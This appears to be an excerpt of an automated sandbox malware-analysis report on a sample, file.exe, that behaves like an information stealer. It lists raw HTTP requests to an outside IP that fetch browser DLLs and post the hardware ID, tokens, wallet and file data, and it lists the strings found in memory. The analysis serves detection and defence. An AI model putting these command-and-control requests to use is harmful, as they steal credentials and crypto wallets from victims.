6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="file"------BFHDAEHDAKECGCAKFCFI--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------KFCFIEHCFIECBGCBFHIJContent-Disposition: form-data; name="message"wallets------KFCFIEHCFIECBGCBFHIJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 2d 2d 0d 0a Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="message"files------IECFIEGDBKJKFIDHIECG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFCHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 2d 2d 0d 0a Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file"------BAEBFIIECBGCBGDHCAFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 2d 2d 0d 0a Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="message"ybncbhylepme------JDBFIIEBGCAKKEBFBAAF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JEHJKJEBGHJJKEBGIECA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.37:80

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003260A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_003260A0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 34 30 33 34 44 42 35 46 45 31 30 33 30 33 36 31 34 34 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="hwid"88F4034DB5FE1030361446------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="build"doma------DBAEHCGHIIIDHIECFHJD--

Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de1
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll)
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlle
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2360250459.0000000000F67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll0de163924d/nss3.dllv
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpp
Source: file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwser
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: file.exe, 00000000.00000002.2360250459.0000000000F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~
Source: file.exe, 00000000.00000002.2359171753.00000000004EB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2360250459.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37s
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2387548529.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375735830.000000001D3D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.2360250459.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, HIEHDAFH.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
